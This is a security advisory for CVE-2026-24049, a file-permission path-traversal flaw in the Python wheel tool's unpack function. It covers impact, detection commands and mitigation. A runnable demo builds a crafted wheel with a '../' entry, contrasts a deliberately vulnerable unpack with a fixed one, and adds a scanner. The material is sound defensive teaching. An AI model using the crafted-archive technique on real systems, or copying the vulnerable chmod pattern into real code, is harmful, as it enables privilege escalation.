CVE-2026-24049
File Permission Modification in Python wheel Unpack Enables Privilege Escalation

Publication date: 2026-01-22

Last updated on: 2026-02-18

Assigner: GitHub, Inc.

Description
wheel is a command line tool for manipulating Python wheel files, as defined in PEP 427. In versions 0.46.1 and below, the unpack function is vulnerable to file permission modification through mishandling of file permissions after extraction. The logic blindly trusts the filename from the archive header for the chmod operation, even though the extraction process itself might have sanitized the path. Attackers can craft a malicious wheel file that, when unpacked, changes the permissions of critical system files (e.g., /etc/passwd, SSH keys, config files), allowing for Privilege Escalation or arbitrary code execution by modifying now-writable scripts. This issue has been fixed in version 0.46.2.
Meta Information
Generated: 2026-06-16
AI Q&A: 2026-01-22
EPSS Evaluated: 2026-06-15
Affected Vendors & Products (1 associated CPE)
Vendor: wheel_project
Product: wheel
Version / Range: from 0.40.0 (inclusive) to 0.46.2 (exclusive)
CWE
CWE-732: The product specifies permissions for a security-critical resource in a way that allows that resource to be read or modified by unintended actors.
CWE-22: The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.
Executive Summary

CVE-2026-24049 is a vulnerability in the Python 'wheel' package's unpack function (versions 0.46.1 and below) where the code improperly applies file permissions after extracting files from a wheel archive. The unpack function blindly trusts filenames from the archive header, which can include path traversal sequences like '../'. This allows an attacker to craft a malicious wheel file that, when unpacked, changes the permissions of files outside the intended extraction directory, including critical system files. This can lead to unauthorized permission changes, enabling privilege escalation or arbitrary code execution. The issue was fixed in version 0.46.2 by applying permissions only to sanitized, extracted file paths. [1, 3]

Impact Analysis

This vulnerability can allow an attacker to modify the permissions of arbitrary files on your system outside the intended extraction directory when unpacking a malicious wheel file. For example, critical system files like /etc/passwd, SSH keys, or configuration files could be made world-writable. This can lead to privilege escalation or arbitrary code execution, compromising system integrity and security. [1, 3]

Detection Guidance

Start by confirming whether a vulnerable wheel is installed: versions 0.46.1 and below contain the affected unpack function. Check with `pip show wheel` or `pip list | grep wheel` (repeat this for every virtual environment and interpreter on the host, since each has its own copy). To look for past exploitation, audit permissions on critical files for unexpected changes: `ls -l /etc/passwd` for a single file, or `find /etc -type f -perm /o+w` to list files in /etc that are writable by others; do the same for SSH keys under /home/*/.ssh and /root/.ssh. Because the exploit only requires the chmod target to exist, a successful attack leaves no new file in the extraction directory other than the sanitized copy, so the permission audit is the more reliable indicator. Finally, scan wheel files before running `wheel unpack` on them: any archive member whose name contains '../' (or that starts with '/') is a strong sign of a crafted archive, and pre-unpack scanning can catch exploitation attempts that the version check alone would miss. [3]

Mitigation Strategies

The immediate mitigation step is to upgrade the wheel package to version 0.46.2 or later, where the vulnerability has been fixed by ensuring that file permission changes are applied only to sanitized, extracted file paths within the intended directory. You can upgrade by running: `pip install --upgrade wheel`. Additionally, avoid unpacking wheel files from untrusted sources until the upgrade is applied. If you suspect exploitation, audit and restore permissions on critical system files that may have been altered. [2, 3]
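The three points made above (the mismatch between the sanitized path that extraction writes and the raw archive name passed to chmod, from the Description; the pre-unpack scan for traversal entries, from Detection Guidance; and the fix of applying permissions only to the path actually extracted, from Mitigation Strategies) are shown together in the following runnable Python example. This is added illustration code, not the wheel project's own source: `vulnerable_unpack` reproduces the pattern the advisory describes in simplified form, `build_malicious_wheel` writes a constructed wheel-like zip with one `../` member, and the "victim" is our own mode-0600 file inside a throw-away temporary directory, so nothing outside that directory is touched. POSIX permission semantics are assumed.

```python
"""Unpack-then-chmod mismatch of the kind described for CVE-2026-24049.

zipfile.ZipFile.extract() strips "..", leading "/" and drive letters from a
member name before writing it, and returns the path it actually wrote.  Code
that then calls chmod on ``dest / zinfo.filename`` (the *unsanitized* name)
changes the mode of a file outside ``dest``.  Constructed example; the victim
file lives in a temporary directory, never a real system file.
"""
import os
import stat
import tempfile
import zipfile
from pathlib import Path


def build_malicious_wheel(path: Path) -> None:
    """Write a constructed wheel-like zip containing one traversal entry.

    The entry is marked mode 0666 in its external attributes, the field an
    unpacker reads back to restore the permissions stored in the archive.
    """
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr("pkg/__init__.py", "# benign module\n")
        evil = zipfile.ZipInfo("../victim.txt")          # escapes dest
        evil.external_attr = (stat.S_IFREG | 0o666) << 16
        zf.writestr(evil, "attacker-controlled content\n")


def vulnerable_unpack(wheel: Path, dest: Path) -> None:
    """Pattern the advisory describes: chmod uses the raw archive name."""
    with zipfile.ZipFile(wheel) as zf:
        for zinfo in zf.infolist():
            zf.extract(zinfo, dest)                       # sanitized write
            mode = zinfo.external_attr >> 16 & 0o777
            dest.joinpath(zinfo.filename).chmod(mode)     # unsanitized chmod


def hardened_unpack(wheel: Path, dest: Path) -> None:
    """Fix: chmod only the path that extract() reports it actually wrote."""
    with zipfile.ZipFile(wheel) as zf:
        for zinfo in zf.infolist():
            written = zf.extract(zinfo, dest)
            mode = zinfo.external_attr >> 16 & 0o777
            os.chmod(written, mode)


def suspicious_entries(wheel: Path) -> list[str]:
    """Pre-unpack scan: member names that would resolve outside dest."""
    flagged = []
    with zipfile.ZipFile(wheel) as zf:
        for name in zf.namelist():
            parts = name.replace("\\", "/").split("/")
            absolute = name.startswith(("/", "\\")) or (
                len(name) > 1 and name[1] == ":"          # Windows drive
            )
            if absolute or ".." in parts:
                flagged.append(name)
    return flagged


def _mode(path: Path) -> int:
    return stat.S_IMODE(path.stat().st_mode)


def run_case(unpack) -> int:
    """Create a 0600 victim beside the unpack dir, unpack, return its mode."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        victim = root / "victim.txt"                      # constructed target
        victim.write_text("sensitive\n")
        victim.chmod(0o600)
        wheel = root / "pkg-1.0-py3-none-any.whl"
        build_malicious_wheel(wheel)
        unpack(wheel, root / "unpacked")                  # dest is a subdir
        return _mode(victim)


def demo() -> dict:
    with tempfile.TemporaryDirectory() as tmp:
        wheel = Path(tmp) / "pkg-1.0-py3-none-any.whl"
        build_malicious_wheel(wheel)
        flagged = suspicious_entries(wheel)
    return {
        "vulnerable_victim_mode": run_case(vulnerable_unpack),
        "hardened_victim_mode": run_case(hardened_unpack),
        "flagged": flagged,
    }


if __name__ == "__main__":
    r = demo()
    print(f"vulnerable unpack: victim mode {r['vulnerable_victim_mode']:o}")
    print(f"hardened unpack:   victim mode {r['hardened_victim_mode']:o}")
    print("flagged entries:", r["flagged"])
```

Running it shows the vulnerable path leaving the outside file at mode 666 while the hardened path leaves it at 600; the scanner flags `../victim.txt` before any extraction happens. The fix is deliberately small: `ZipFile.extract()` already returns the sanitized destination, so the permission restore simply has to use that value instead of re-joining the untrusted member name.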

Compliance Impact

This vulnerability allows attackers to modify permissions of critical system files, potentially leading to privilege escalation or arbitrary code execution. Such unauthorized access or modification of sensitive files could result in violations of security requirements mandated by standards like GDPR or HIPAA, which require protection of data integrity and confidentiality. Therefore, exploitation of this vulnerability could negatively impact compliance with these regulations by enabling unauthorized access or alteration of protected data or system configurations. [3]
